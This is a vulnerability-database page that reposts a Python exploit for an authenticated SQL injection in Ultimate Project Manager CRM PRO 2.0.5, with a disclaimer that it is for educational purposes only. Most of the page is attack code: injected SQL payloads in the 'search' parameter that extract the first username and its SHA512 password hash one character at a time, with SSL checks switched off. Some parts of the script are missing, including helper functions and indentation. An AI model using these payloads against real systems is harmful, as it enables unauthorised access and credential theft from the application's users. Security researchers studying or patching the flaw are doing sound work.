Ultimate project manager crm pro version 2.0.5 sqli (authenticated) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-10-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Ultimate project manager crm pro version 2.0.5 sqli (authenticated) is for educational purposes only and if it is used you will do on your own risk!
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# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
# Date: 2020-16-09
# Exploit Author: nag0mez
# Vendor Homepage: https://ultimatepro.codexcube.com/
# Version: <= 2.0.5
# Tested on: Kali Linux 2020.2
# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.
# The original vulnerability was found on a server with an invalid SSL certificate,
# which Python could not verify. I added the verify=False parameter to avoid SSL check.
# The lack of verification results in a warning message from Python.
# To get a clean output, we will ignore all warnings.
import warnings
found = False
for c in chars:
test = known + c
payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
length = send_payload(payload)
if length > 2:
found = True
known += c
print(c, end='')
return known
def get_hash(username):
found = True
known = ''
while found:
found = False
for c in hex_chars:
test = known + c
payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
length = send_payload(payload)
if length > 2:
found = True
known += c
print(c, end='')
return known
if __name__ == '__main__':
print('Exploit started.')
print('Guessing username...')
username = get_first_user()
if username != '':
print('\nUsername found: {}'.format(username))
print('\nCould not get username! Exit.')
print('Guessing password SHA512 hash...')
sha = get_hash(username)
if sha != '':
print('\nHash found: {}'.format(sha))
print('\nCould not get Hash! Exit.')
Ultimate project manager crm pro version 2.0.5 sqli (authenticated)